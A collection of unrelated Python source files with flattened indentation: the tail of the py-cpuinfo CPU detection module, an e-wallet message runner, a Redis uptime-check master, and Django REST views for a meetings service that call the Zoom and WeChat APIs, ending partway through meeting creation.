'apic' : is_set(9), # Local APIC present (multiprocessor operation support)
'sepamd' : is_set(10), # Fast system calls (AMD only)
'sep' : is_set(11), # Fast system calls
'mtrr' : is_set(12), # Memory Type Range Registers
'pge' : is_set(13), # Page Global Enable
'mca' : is_set(14), # Machine Check Architecture
'cmov' : is_set(15), # Conditional MOVe instructions
'pat' : is_set(16), # Page Attribute Table
'pse36' : is_set(17), # 36 bit Page Size Extensions
'serial' : is_set(18), # Processor Serial Number
'clflush' : is_set(19), # Cache Flush
#'reserved1' : is_set(20), # reserved
'dts' : is_set(21), # Debug Trace Store
'acpi' : is_set(22), # ACPI support
'mmx' : is_set(23), # MultiMedia Extensions
'fxsr' : is_set(24), # FXSAVE and FXRSTOR instructions
'sse' : is_set(25), # SSE instructions
'sse2' : is_set(26), # SSE2 (WNI) instructions
'ss' : is_set(27), # self snoop
#'reserved2' : is_set(28), # reserved
'tm' : is_set(29), # Automatic clock control
'ia64' : is_set(30), # IA64 instructions
'3dnow' : is_set(31) # 3DNow! instructions available
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
flags.sort()
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, 6),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, 6),
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_kstat():
'''
Returns the CPU info gathered from isainfo and kstat.
Returns {} if isainfo or kstat are not found.
'''
try:
# Just return {} if there is no isainfo or kstat
if not DataSource.has_isainfo() or not DataSource.has_kstat():
return {}
# If isainfo fails return {}
returncode, flag_output = DataSource.isainfo_vb()
if flag_output == None or returncode != 0:
return {}
# If kstat fails return {}
returncode, kstat = DataSource.kstat_m_cpu_info()
if kstat == None or returncode != 0:
return {}
# Various fields
vendor_id = kstat.split('\tvendor_id ')[1].split('\n')[0].strip()
processor_brand = kstat.split('\tbrand ')[1].split('\n')[0].strip()
stepping = int(kstat.split('\tstepping ')[1].split('\n')[0].strip())
model = int(kstat.split('\tmodel ')[1].split('\n')[0].strip())
family = int(kstat.split('\tfamily ')[1].split('\n')[0].strip())
# Flags
flags = flag_output.strip().split('\n')[-1].strip().lower().split()
flags.sort()
# Convert from GHz/MHz string to Hz
scale = 6
hz_advertised = kstat.split('\tclock_MHz ')[1].split('\n')[0].strip()
hz_advertised = to_hz_string(hz_advertised)
# Convert from GHz/MHz string to Hz
hz_actual = kstat.split('\tcurrent_clock_Hz ')[1].split('\n')[0].strip()
hz_actual = to_hz_string(hz_actual)
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, 0),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, 0),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def CopyNewFields(info, new_info):
keys = [
'vendor_id', 'hardware', 'brand', 'hz_advertised', 'hz_actual',
'hz_advertised_raw', 'hz_actual_raw', 'arch', 'bits', 'count',
'raw_arch_string', 'l2_cache_size', 'l2_cache_line_size',
'l2_cache_associativity', 'stepping', 'model', 'family',
'processor_type', 'extended_model', 'extended_family', 'flags',
'l3_cache_size', 'l1_data_cache_size', 'l1_instruction_cache_size'
]
for key in keys:
if new_info.get(key, None) and not info.get(key, None):
info[key] = new_info[key]
elif key == 'flags' and new_info.get('flags'):
for f in new_info['flags']:
if f not in info['flags']: info['flags'].append(f)
info['flags'].sort()
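# Note: for scalar fields the first source to supply a value wins; 'flags' is the
# exception and is merged across sources and kept sorted.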
def get_cpu_info():
'''
Returns the CPU info by using the best sources of information for your OS.
Returns {} if nothing is found.
'''
# Get the CPU arch and bits
arch, bits = parse_arch(DataSource.raw_arch_string)
friendly_maxsize = { 2**31-1: '32 bit', 2**63-1: '64 bit' }.get(sys.maxsize) or 'unknown bits'
friendly_version = "{0}.{1}.{2}.{3}.{4}".format(*sys.version_info)
PYTHON_VERSION = "{0} ({1})".format(friendly_version, friendly_maxsize)
info = {
'python_version' : PYTHON_VERSION,
'cpuinfo_version' : CPUINFO_VERSION,
'arch' : arch,
'bits' : bits,
'count' : DataSource.cpu_count,
'raw_arch_string' : DataSource.raw_arch_string,
}
# Try the Windows wmic
CopyNewFields(info, _get_cpu_info_from_wmic())
# Try the Windows registry
CopyNewFields(info, _get_cpu_info_from_registry())
# Try /proc/cpuinfo
CopyNewFields(info, _get_cpu_info_from_proc_cpuinfo())
# Try cpufreq-info
CopyNewFields(info, _get_cpu_info_from_cpufreq_info())
# Try LSCPU
CopyNewFields(info, _get_cpu_info_from_lscpu())
# Try sysctl
CopyNewFields(info, _get_cpu_info_from_sysctl())
# Try kstat
CopyNewFields(info, _get_cpu_info_from_kstat())
# Try dmesg
CopyNewFields(info, _get_cpu_info_from_dmesg())
# Try /var/run/dmesg.boot
CopyNewFields(info, _get_cpu_info_from_cat_var_run_dmesg_boot())
# Try lsprop ibm,pa-features
CopyNewFields(info, _get_cpu_info_from_ibm_pa_features())
# Try sysinfo
CopyNewFields(info, _get_cpu_info_from_sysinfo())
# Try querying the CPU cpuid register
CopyNewFields(info, _get_cpu_info_from_cpuid())
return info
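# Minimal usage sketch (not part of the original module); mirrors what main()
# below does with the returned dict:
# info = get_cpu_info()
# print(info.get('brand'), info.get('hz_advertised'), info.get('count'))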
# Make sure we are running on a supported system
def _check_arch():
arch, bits = parse_arch(DataSource.raw_arch_string)
if not arch in ['X86_32', 'X86_64', 'ARM_7', 'ARM_8', 'PPC_64', 'S390X']:
raise Exception("py-cpuinfo currently only works on X86 and some PPC, S390X and ARM CPUs.")
def main():
try:
_check_arch()
except Exception as err:
sys.stderr.write(str(err) + "\n")
sys.exit(1)
info = get_cpu_info()
if info:
print('python version: {0}'.format(info.get('python_version', '')))
print('cpuinfo version: {0}'.format(info.get('cpuinfo_version', '')))
print('Vendor ID: {0}'.format(info.get('vendor_id', '')))
print('Hardware Raw: {0}'.format(info.get('hardware', '')))
print('Brand: {0}'.format(info.get('brand', '')))
print('Hz Advertised: {0}'.format(info.get('hz_advertised', '')))
print('Hz Actual: {0}'.format(info.get('hz_actual', '')))
print('Hz Advertised Raw: {0}'.format(info.get('hz_advertised_raw', '')))
print('Hz Actual Raw: {0}'.format(info.get('hz_actual_raw', '')))
print('Arch: {0}'.format(info.get('arch', '')))
print('Bits: {0}'.format(info.get('bits', '')))
print('Count: {0}'.format(info.get('count', '')))
print('Raw Arch String: {0}'.format(info.get('raw_arch_string', '')))
print('L1 Data Cache Size: {0}'.format(info.get('l1_data_cache_size', '')))
print('L1 Instruction Cache Size: {0}'.format(info.get('l1_instruction_cache_size', '')))
print('L2 Cache Size: {0}'.format(info.get('l2_cache_size', '')))
print('L2 Cache Line Size: {0}'.format(info.get('l2_cache_line_size', '')))
print('L2 Cache Associativity: {0}'.format(info.get('l2_cache_associativity', '')))
print('L3 Cache Size: {0}'.format(info.get('l3_cache_size', '')))
print('Stepping: {0}'.format(info.get('stepping', '')))
print('Model: {0}'.format(info.get('model', '')))
print('Family: {0}'.format(info.get('family', '')))
print('Processor Type: {0}'.format(info.get('processor_type', '')))
print('Extended Model: {0}'.format(info.get('extended_model', '')))
print('Extended Family: {0}'.format(info.get('extended_family', '')))
print('Flags: {0}'.format(', '.join(info.get('flags', ''))))
else:
sys.stderr.write("Failed to find cpu info\n")
sys.exit(1)
if __name__ == '__main__':
from multiprocessing import freeze_support
freeze_support()
main()
else:
_check_arch()
|
runner.py
|
import threading
from publisher import EWalletPublisher
from consumer import EWalletConsumer
class EWalletRunner():
def __init__(self):
self.publisher = EWalletPublisher('172.17.0.3', '1306398983')
self.consumer = EWalletConsumer('172.17.0.3', '1306398983', self.publisher)
publish_ping_thread = threading.Thread(target=self.publisher.publish_ping)
publish_ping_thread.start()
consume_ping_thread = threading.Thread(target=self.consumer.consume_ping)
consume_ping_thread.start()
# === REGISTER
consume_register_request_thread = threading.Thread(
target=self.consumer.consume_register_request
)
consume_register_request_thread.start()
# === GET SALDO
consume_saldo_request_thread = threading.Thread(
target=self.consumer.consume_saldo_request
)
consume_saldo_request_thread.start()
# === TRANSFER
consume_transfer_request_thread = threading.Thread(
target=self.consumer.consume_transfer_request
)
consume_transfer_request_thread.start()
# === GET TOTAL SALDO
consume_total_saldo_request_thread = threading.Thread(
target=self.consumer.consume_total_saldo_request
)
consume_total_saldo_request_thread.start()
def do_register(self, user_id, nama, receiver_id):
consumer = threading.Thread(
target=self.consumer.consume_register_response
)
consumer.start()
self.publisher.publish_register_request(user_id, nama, receiver_id)
def do_get_saldo(self, user_id, receiver_id):
consumer = threading.Thread(
target=self.consumer.consume_saldo_response
)
consumer.start()
self.publisher.publish_saldo_request(user_id, receiver_id)
def do_transfer(self, user_id, nilai, receiver_id):
self.consumer.transfer_user_id = user_id
self.consumer.transfer_nilai = nilai
consumer = threading.Thread(
target=self.consumer.consume_transfer_response
)
consumer.start()
self.publisher.publish_transfer_request(user_id, nilai, receiver_id)
def do_get_total_saldo(self, user_id, receiver_id):
consumer = threading.Thread(
target=self.consumer.consume_total_saldo_response
)
consumer.start()
self.publisher.publish_total_saldo_request(user_id, receiver_id)
runner = EWalletRunner()
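# Illustrative calls against the module-level runner; the ids, name, and amount
# below are made up:
# runner.do_register('U001', 'Alice', 'R001')
# runner.do_get_saldo('U001', 'R001')
# runner.do_transfer('U001', 50000, 'R001')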
|
pingermaster.py
|
#!/usr/bin/env python
import redis
import yaml
import json
import time
import threading
import logging
from handlers import Handler
class Config:
def __init__(self):
with open('./checks.yaml') as f:
self.config = yaml.safe_load(f)
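# Assumed shape of ./checks.yaml, inferred from how Master reads it below; the
# URL, numbers, and handler/plugin names are illustrative only:
#
# checks:
#   https://example.org:
#     interval: 60
#     failed_checks: 3
#     handler: default
# handlers:
#   default:
#     plugin: log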
class Master:
def __init__(self):
self.handlers = Handler.plugins
self.config = Config().config
self.checks = self.config['checks']
self.redis = redis.StrictRedis(host='localhost', port=6379, db=0)
self.pubsub = self.redis.pubsub()
self.pubsub.subscribe(['results'])
self.log = logging.getLogger(self.__class__.__name__)
for check in self.checks.keys():
self.redis.set(self.key(check, 'time'), 0)
self.redis.set(self.key(check, 'failures'), 0)
self.redis.delete(self.key(check, 'down'))
def publish_check(self, url, params):
last_check = int(self.redis.get(self.key(url, 'time')))
now_time = int(time.time())
if last_check + params['interval'] <= now_time:
self.redis.set(self.key(url, 'time'), int(time.time()))
self.log.info("publishing check {0}".format(url))
self.redis.rpush('checks',
json.dumps({'url': url, 'params': params}))
def handle_result(self, url, params, result, message, details):
down = self.redis.get(self.key(url, 'down'))
handler_config = self.config['handlers'][params['handler']]
handler = self.handlers[handler_config['plugin']](**handler_config)
if result == 'DOWN':
num_failures = int(self.redis.get(self.key(url, 'failures')))
if num_failures >= params['failed_checks'] and not down:
message = "{0} DOWN {1}".format(url, message)
handler.down_alert(url, message, details)
self.redis.set(self.key(url, 'down'), True)
num_failures += 1
self.redis.set(self.key(url, 'failures'), num_failures)
if result == 'UP' and down:
message = "{0} UP".format(url)
handler.up_alert(url, message)
self.redis.delete(self.key(url, 'down'))
self.redis.set(self.key(url, 'failures'), 0)
def key(self, *args):
return "_".join(args)
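# e.g. key('https://example.org', 'down') -> 'https://example.org_down'
# (the URL is illustrative).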
def run(self):
for item in self.pubsub.listen():
print(item['data'])
if item['data'] != 1:
item = json.loads(item['data'])
self.handle_result(**item)
if __name__ == "__main__":
import logging
logging.basicConfig(level=logging.INFO)
pp = Master()
handler = threading.Thread(target=pp.run)
handler.daemon = True
handler.start()
while True:
for check, params in pp.checks.items():
pp.publish_check(check, params)
time.sleep(1)
|
views.py
|
import datetime
import json
import math
import random
import re
import requests
import logging
import time
import sys
from django.conf import settings
from django.db.models import Q
from django.http import JsonResponse
from drf_yasg.utils import swagger_auto_schema
from rest_framework.filters import SearchFilter
from rest_framework.generics import GenericAPIView
from rest_framework.mixins import ListModelMixin, CreateModelMixin, RetrieveModelMixin, DestroyModelMixin, \
UpdateModelMixin
from rest_framework_simplejwt import authentication
from meetings.models import User, Group, Meeting, GroupUser, Collect, Video, Record, Activity, ActivityCollect, \
ActivityRegister, Feedback, ActivitySign
from meetings.permissions import MaintainerPermission, AdminPermission, ActivityAdminPermission, SponsorPermission, \
QueryPermission
from meetings.serializers import LoginSerializer, GroupsSerializer, MeetingSerializer, UsersSerializer, \
UserSerializer, GroupUserAddSerializer, GroupSerializer, UsersInGroupSerializer, UserGroupSerializer, \
MeetingListSerializer, GroupUserDelSerializer, UserInfoSerializer, SigsSerializer, MeetingsDataSerializer, \
AllMeetingsSerializer, CollectSerializer, SponsorSerializer, SponsorInfoSerializer, ActivitySerializer, \
ActivitiesSerializer, ActivityDraftUpdateSerializer, ActivityUpdateSerializer, ActivityCollectSerializer, \
ActivityRegisterSerializer, ApplicantInfoSerializer, FeedbackSerializer, ActivityRetrieveSerializer, \
ActivitySignSerializer, ActivityRegistrantsSerializer
from rest_framework.response import Response
from multiprocessing import Process
from meetings.send_email import sendmail
from rest_framework import permissions
from meetings.utils import gene_wx_code, send_applicants_info, send_feedback, invite, send_start_url, gene_sign_code
logger = logging.getLogger('log')
offline = 1
online = 2
class LoginView(GenericAPIView, CreateModelMixin, ListModelMixin):
"""User registration and authorized login."""
serializer_class = LoginSerializer
queryset = User.objects.all()
@swagger_auto_schema(operation_summary='用户注册与授权登陆')
def post(self, request, *args, **kwargs):
return self.create(request, *args, **kwargs)
def perform_create(self, serializer):
serializer.save()
class GroupsView(GenericAPIView, ListModelMixin):
"""Query the names of all SIG groups."""
serializer_class = GroupsSerializer
queryset = Group.objects.all().order_by('group_name')
filter_backends = [SearchFilter]
search_fields = ['group_name']
@swagger_auto_schema(operation_summary='查询所有SIG组')
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
class SigsView(GenericAPIView, ListModelMixin):
"""Query every SIG group's name, homepage, mailing list, and IRC channel, plus each member's nickname, gitee_name, and avatar."""
serializer_class = SigsSerializer
queryset = Group.objects.all()
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
class GroupView(GenericAPIView, RetrieveModelMixin):
"""Query a single SIG group."""
serializer_class = GroupSerializer
queryset = Group.objects.all()
@swagger_auto_schema(operation_summary='查询单个SIG组')
def get(self, request, *args, **kwargs):
return self.retrieve(request, *args, **kwargs)
class UsersIncludeView(GenericAPIView, ListModelMixin):
"""Query all members of the selected SIG group."""
serializer_class = UsersInGroupSerializer
queryset = User.objects.all()
filter_backends = [SearchFilter]
search_fields = ['nickname']
@swagger_auto_schema(operation_summary='查询所选SIG组的所有成员')
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
def get_queryset(self):
try:
groupusers = GroupUser.objects.filter(group_id=self.kwargs['pk']).all()
ids = [x.user_id for x in groupusers]
user = User.objects.filter(id__in=ids)
return user
except KeyError:
pass
class UsersExcludeView(GenericAPIView, ListModelMixin):
"""Query all users who are not in this group."""
serializer_class = UsersSerializer
queryset = User.objects.all().order_by('nickname')
filter_backends = [SearchFilter]
search_fields = ['nickname']
@swagger_auto_schema(operation_summary='查询不在该组的所有用户')
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
def get_queryset(self):
try:
groupusers = GroupUser.objects.filter(group_id=self.kwargs['pk']).all()
ids = [x.user_id for x in groupusers]
user = User.objects.filter().exclude(id__in=ids)
return user
except KeyError:
pass
class UserGroupView(GenericAPIView, ListModelMixin):
"""Query the user's SIG groups and each group's etherpad."""
serializer_class = UserGroupSerializer
queryset = GroupUser.objects.all()
@swagger_auto_schema(operation_summary='查询该用户的SIG组以及该组的etherpad')
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
def get_queryset(self):
try:
usergroup = GroupUser.objects.filter(user_id=self.kwargs['pk']).all()
return usergroup
except KeyError:
pass
class UserView(GenericAPIView, UpdateModelMixin):
"""Update a user's gitee_name."""
serializer_class = UserSerializer
queryset = User.objects.all()
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (AdminPermission,)
@swagger_auto_schema(operation_summary='更新用户gitee_name')
def put(self, request, *args, **kwargs):
return self.update(request, *args, **kwargs)
class GroupUserAddView(GenericAPIView, CreateModelMixin):
"""Batch-add members to a SIG group."""
serializer_class = GroupUserAddSerializer
queryset = GroupUser.objects.all()
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (AdminPermission,)
@swagger_auto_schema(operation_summary='SIG组批量新增成员')
def post(self, request, *args, **kwargs):
return self.create(request, *args, **kwargs)
class GroupUserDelView(GenericAPIView, CreateModelMixin):
"""批量删除组成员"""
serializer_class = GroupUserDelSerializer
queryset = GroupUser.objects.all()
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (AdminPermission,)
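    # Illustrative request body for this endpoint, inferred from the handler
    # below (field names come from the code; the URL path is a placeholder):
    #
    #   POST <groupuser-del endpoint>
    #   {
    #       "group_id": 3,
    #       "ids": "5-12-27"    # user ids joined with '-'
    #   }
    #
    # The handler splits 'ids' on '-' and deletes the matching GroupUser rows.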
def post(self, request, *args, **kwargs):
group_id = self.request.data.get('group_id')
ids = self.request.data.get('ids')
ids_list = [int(x) for x in ids.split('-')]
GroupUser.objects.filter(group_id=group_id, user_id__in=ids_list).delete()
return JsonResponse({'code': 204, 'msg': '删除成功'})
class MeetingsWeeklyView(GenericAPIView, ListModelMixin):
"""查询前后一周的所有会议"""
serializer_class = MeetingListSerializer
queryset = Meeting.objects.filter(is_delete=0)
filter_backends = [SearchFilter]
search_fields = ['topic', 'group_name']
@swagger_auto_schema(operation_summary='查询前后一周的所有会议')
def get(self, request, *args, **kwargs):
self.queryset = self.queryset.filter((Q(
date__gte=str(datetime.datetime.now() - datetime.timedelta(days=7))[:10]) & Q(
date__lte=str(datetime.datetime.now() + datetime.timedelta(days=7))[:10]))).order_by('-date', 'start')
return self.list(request, *args, **kwargs)
class MeetingsDailyView(GenericAPIView, ListModelMixin):
"""查询本日的所有会议"""
serializer_class = MeetingListSerializer
queryset = Meeting.objects.filter(is_delete=0)
@swagger_auto_schema(operation_summary='查询本日的所有会议')
def get(self, request, *args, **kwargs):
self.queryset = self.queryset.filter(date=str(datetime.datetime.now())[:10]).order_by('start')
return self.list(request, *args, **kwargs)
class MeetingsRecentlyView(GenericAPIView, ListModelMixin):
"""查询最近的会议"""
serializer_class = MeetingListSerializer
queryset = Meeting.objects.filter(is_delete=0)
@swagger_auto_schema(operation_summary='查询最近的会议')
def get(self, request, *args, **kwargs):
self.queryset = self.queryset.filter(date__gte=datetime.datetime.now().strftime('%Y-%m-%d')).order_by('date','start')
return self.list(request, *args, **kwargs)
class MeetingView(GenericAPIView, RetrieveModelMixin):
"""查询会议(id)"""
serializer_class = MeetingListSerializer
queryset = Meeting.objects.filter(is_delete=0)
@swagger_auto_schema(operation_summary='查询会议')
def get(self, request, *args, **kwargs):
return self.retrieve(request, *args, **kwargs)
class MeetingDelView(GenericAPIView, DestroyModelMixin):
"""删除会议(mid)"""
serializer_class = MeetingSerializer
queryset = Meeting.objects.all()
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (MaintainerPermission,)
@swagger_auto_schema(operation_summary='删除会议')
def delete(self, request, *args, **kwargs):
mid = kwargs.get('mid')
try:
url = "https://api.zoom.us/v2/meetings/{}".format(mid)
headers = {
"authorization": "Bearer {}".format(settings.ZOOM_TOKEN)}
requests.request("DELETE", url, headers=headers)
        except Exception:
            # Ignore Zoom API failures; the local record is still soft-deleted below.
            pass
        # Soft-delete the meeting
meeting = Meeting.objects.get(mid=mid)
Meeting.objects.filter(mid=mid).update(is_delete=1)
meeting_id = meeting.id
mid = meeting.mid
logger.info('{} has canceled the meeting which mid was {}'.format(request.user.gitee_name, mid))
        # Send meeting cancellation notifications to users who collected the meeting
collections = Collect.objects.filter(meeting_id=meeting_id)
if collections:
access_token = self.get_token()
topic = meeting.topic
date = meeting.date
start_time = meeting.start
time = date + ' ' + start_time
for collection in collections:
user_id = collection.user_id
user = User.objects.get(id=user_id)
nickname = user.nickname
openid = user.openid
content = self.get_remove_template(openid, topic, time, mid)
r = requests.post(
'https://api.weixin.qq.com/cgi-bin/message/subscribe/send?access_token={}'.format(access_token),
data=json.dumps(content))
if r.status_code != 200:
logger.error('status code: {}'.format(r.status_code))
logger.error('content: {}'.format(r.json()))
else:
if r.json()['errcode'] != 0:
logger.warning('Error Code: {}'.format(r.json()['errcode']))
logger.warning('Error Msg: {}'.format(r.json()['errmsg']))
logger.warning('receiver: {}'.format(nickname))
else:
logger.info('meeting {} cancel message sent to {}.'.format(mid, nickname))
                # Remove the collection record
collection.delete()
return JsonResponse({"code": 204, "message": "Delete successfully."})
def get_remove_template(self, openid, topic, time, mid):
if len(topic) > 20:
topic = topic[:20]
content = {
"touser": openid,
"template_id": "UpxRbZf8Z9QiEPlZeRCgp_MKvvqHlo6tcToY8fToK50",
"page": "/pages/index/index",
"miniprogram_state": "developer",
"lang": "zh-CN",
"data": {
"thing1": {
"value": topic
},
"time2": {
"value": time
},
"thing4": {
"value": "会议{}已被取消".format(mid)
}
}
}
return content
def get_token(self):
appid = settings.APP_CONF['appid']
secret = settings.APP_CONF['secret']
url = 'https://api.weixin.qq.com/cgi-bin/token?appid={}&secret={}&grant_type=client_credential'.format(appid,
secret)
r = requests.get(url)
if r.status_code == 200:
try:
access_token = r.json()['access_token']
return access_token
except KeyError as e:
logger.error(e)
else:
logger.error(r.json())
logger.error('fail to get access_token,exit.')
sys.exit(1)
class UserInfoView(GenericAPIView, RetrieveModelMixin):
"""查询本机用户的level和gitee_name"""
serializer_class = UserInfoSerializer
queryset = User.objects.all()
authentication_classes = (authentication.JWTAuthentication,)
def get(self, request, *args, **kwargs):
user_id = kwargs.get('pk')
if user_id != request.user.id:
logger.warning('user_id did not match.')
logger.warning('user_id:{}, request.user.id:{}'.format(user_id, request.user.id))
return JsonResponse({"code": 400, "message": "错误操作,信息不匹配!"})
return self.retrieve(request, *args, **kwargs)
class MeetingsDataView(GenericAPIView, ListModelMixin):
"""网页日历数据"""
serializer_class = MeetingsDataSerializer
queryset = Meeting.objects.filter(is_delete=0).order_by('start')
def get(self, request, *args, **kwargs):
queryset = self.filter_queryset(self.get_queryset()).values()
tableData = []
date_list = []
for query in queryset:
date_list.append(query.get('date'))
date_list = sorted(list(set(date_list)))
for date in date_list:
tableData.append(
{
'date': date,
'timeData': [{
'id': meeting.id,
'group_name': meeting.group_name,
'startTime': meeting.start,
'endTime': meeting.end,
'duration': math.ceil(float(meeting.end.replace(':', '.'))) - math.floor(
float(meeting.start.replace(':', '.'))),
'duration_time': meeting.start.split(':')[0] + ':00' + '-' + str(
math.ceil(float(meeting.end.replace(':', '.')))) + ':00',
'name': meeting.topic,
'creator': meeting.sponsor,
'detail': meeting.agenda,
'url': User.objects.get(id=meeting.user_id).avatar,
'join_url': meeting.join_url,
'meeting_id': meeting.mid,
'etherpad': meeting.etherpad,
'video_url': '' if not Record.objects.filter(mid=meeting.mid, platform='bilibili') else
Record.objects.filter(mid=meeting.mid, platform='bilibili').values()[0]['url']
} for meeting in Meeting.objects.filter(is_delete=0, date=date)]
})
return Response({'tableData': tableData})
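# Note on the duration fields above: 'start' and 'end' are 'HH:MM' strings and
# are treated as decimals (e.g. '10:30' -> 10.3), so 'duration' is the meeting
# length rounded outward to whole hours, presumably to fit an hour-based
# calendar grid. SigMeetingsDataView below reuses the same computation.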
class SigMeetingsDataView(GenericAPIView, ListModelMixin):
"""网页SIG组日历数据"""
serializer_class = MeetingsDataSerializer
queryset = Meeting.objects.filter(is_delete=0).order_by('date', 'start')
def get(self, request, *args, **kwargs):
group_id = kwargs.get('pk')
queryset = self.filter_queryset(self.get_queryset()).filter(group_id=group_id).filter((Q(
date__gte=str(datetime.datetime.now() - datetime.timedelta(days=180))[:10]) & Q(
date__lte=str(datetime.datetime.now() + datetime.timedelta(days=30))[:10]))).values()
tableData = []
date_list = []
for query in queryset:
date_list.append(query.get('date'))
date_list = sorted(list(set(date_list)))
for date in date_list:
tableData.append(
{
'date': date,
'timeData': [{
'id': meeting.id,
'group_name': meeting.group_name,
'date': meeting.date,
'startTime': meeting.start,
'endTime': meeting.end,
'duration': math.ceil(float(meeting.end.replace(':', '.'))) - math.floor(
float(meeting.start.replace(':', '.'))),
'duration_time': meeting.start.split(':')[0] + ':00' + '-' + str(
math.ceil(float(meeting.end.replace(':', '.')))) + ':00',
'name': meeting.topic,
'creator': meeting.sponsor,
'detail': meeting.agenda,
'url': User.objects.get(id=meeting.user_id).avatar,
'join_url': meeting.join_url,
'meeting_id': meeting.mid,
'etherpad': meeting.etherpad,
'video_url': '' if not Record.objects.filter(mid=meeting.mid, platform='bilibili') else
Record.objects.filter(mid=meeting.mid, platform='bilibili').values()[0]['url']
} for meeting in Meeting.objects.filter(is_delete=0, group_id=group_id, date=date)]
})
return Response({'tableData': tableData})
class MeetingsView(GenericAPIView, CreateModelMixin):
"""创建会议"""
serializer_class = MeetingSerializer
queryset = Meeting.objects.all()
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (MaintainerPermission,)
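    # Illustrative request body for meeting creation; field names are taken from
    # the handler below, values are made up:
    #
    #   {
    #       "topic": "Tech Committee sync",
    #       "sponsor": "someone",
    #       "group_name": "TC",
    #       "group_id": 1,
    #       "date": "2021-07-01",
    #       "start": "10:00",
    #       "end": "11:00",
    #       "etherpad": "<etherpad url>",
    #       "emaillist": "dev@openeuler.org",   # optional
    #       "community": "openeuler",           # optional
    #       "agenda": "agenda text",            # optional
    #       "record": "cloud"                   # optional, enables cloud recording
    #   }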
@swagger_auto_schema(operation_summary='创建会议')
def post(self, request, *args, **kwargs):
t1 = time.time()
host_dict = settings.MEETING_HOSTS
        # Parse the request data
data = self.request.data
date = data['date']
start = data['start']
end = data['end']
topic = data['topic']
community = data['community'] if 'community' in data else 'openeuler'
emaillist = data['emaillist'] if 'emaillist' in data else ''
summary = data['agenda'] if 'agenda' in data else ''
user_id = request.user.id
group_id = data['group_id']
record = data['record'] if 'record' in data else ''
start_time = ' '.join([date, start])
if start_time < datetime.datetime.now().strftime('%Y-%m-%d %H:%M'):
logger.warning('The start time should not be earlier than the current time.')
return JsonResponse({'code': 1005, 'message': '请输入正确的开始时间'})
if start >= end:
logger.warning('The end time must be greater than the start time.')
return JsonResponse({'code': 1001, 'message': '请输入正确的结束时间'})
start_search = datetime.datetime.strftime(
(datetime.datetime.strptime(start, '%H:%M') - datetime.timedelta(minutes=30)),
'%H:%M')
end_search = datetime.datetime.strftime(
(datetime.datetime.strptime(end, '%H:%M') + datetime.timedelta(minutes=30)),
'%H:%M')
        # Check whether the requested slot conflicts with existing booked meetings
unavailable_host_id = []
available_host_id = []
meetings = Meeting.objects.filter(is_delete=0, date=date, end__gt=start_search, start__lt=end_search).values()
try:
for meeting in meetings:
host_id = meeting['host_id']
unavailable_host_id.append(host_id)
                logger.info('unavailable_host_id: {}'.format(unavailable_host_id))
except KeyError:
pass
host_list = list(host_dict.keys())
logger.info('host_list:{}'.format(host_list))
for host_id in host_list:
if host_id not in unavailable_host_id:
available_host_id.append(host_id)
        logger.info('available_host_id: {}'.format(available_host_id))
if len(available_host_id) == 0:
logger.warning('暂无可用host')
return JsonResponse({'code': 1000, 'message': '暂无可用host,请前往官网查看预定会议'})
        # Pick a random host_id from available_host_id and look up its Zoom account in host_dict
host_id = random.choice(available_host_id)
host = host_dict[host_id]
logger.info('host_id:{}'.format(host_id))
logger.info('host:{}'.format(host))
        # Build the UTC start_time string (local time is UTC+8)
if int(start.split(':')[0]) >= 8:
start_time = date + 'T' + ':'.join([str(int(start.split(':')[0]) - 8), start.split(':')[1], '00Z'])
else:
d = datetime.datetime.strptime(date, '%Y-%m-%d') - datetime.timedelta(days=1)
d2 = datetime.datetime.strftime(d, '%Y-%m-%d %H%M%S')[:10]
start_time = d2 + 'T' + ':'.join([str(int(start.split(':')[0]) + 16), start.split(':')[1], '00Z'])
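        # The branch above converts local time (UTC+8) to the UTC timestamp Zoom
        # expects: times at or after 08:00 map to the same date minus 8 hours,
        # earlier times roll back to the previous date plus 16 hours. A clearer
        # formulation that also zero-pads the hour (sketch only, not used here):
        #
        #   utc_dt = datetime.datetime.strptime(date + ' ' + start, '%Y-%m-%d %H:%M') \
        #            - datetime.timedelta(hours=8)
        #   start_time = utc_dt.strftime('%Y-%m-%dT%H:%M:00Z')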
        # Compute the meeting duration in minutes
duration = (int(end.split(':')[0]) - int(start.split(':')[0])) * 60 + (
int(end.split(':')[1]) - int(start.split(':')[1]))
        # Assemble the payload for the Zoom API
password = ""
for i in range(6):
ch = chr(random.randrange(ord('0'), ord('9') + 1))
password += ch
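        # The loop above generates a random 6-digit numeric meeting password;
        # a one-line equivalent would be
        # ''.join(random.choice('0123456789') for _ in range(6)).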
new_data = {}
new_data['settings'] = {}
new_data['start_time'] = start_time
new_data['duration'] = duration
new_data['topic'] = topic
new_data['password'] = password
new_data['settings']['waiting_room'] = False
new_data['settings']['auto_recording'] = record
new_data['settings']['join_before_host'] = True
new_data['settings']['jbh_time'] = 5
headers = {
"content-type": "application/json",
"authorization": "Bearer {}".format(settings.ZOOM_TOKEN)
}
url = "https://api.zoom.us/v2/users/{}/meetings".format(host)
        # Create the meeting via the Zoom API
response = requests.post(url, data=json.dumps(new_data), headers=headers)
if response.status_code != 201:
            logger.error('code: {}, fail to create.'.format(response.status_code))
return JsonResponse({'code': response.status_code, 'msg': 'Fail to create.'})
response = response.json()
        # Send notification emails in a separate process
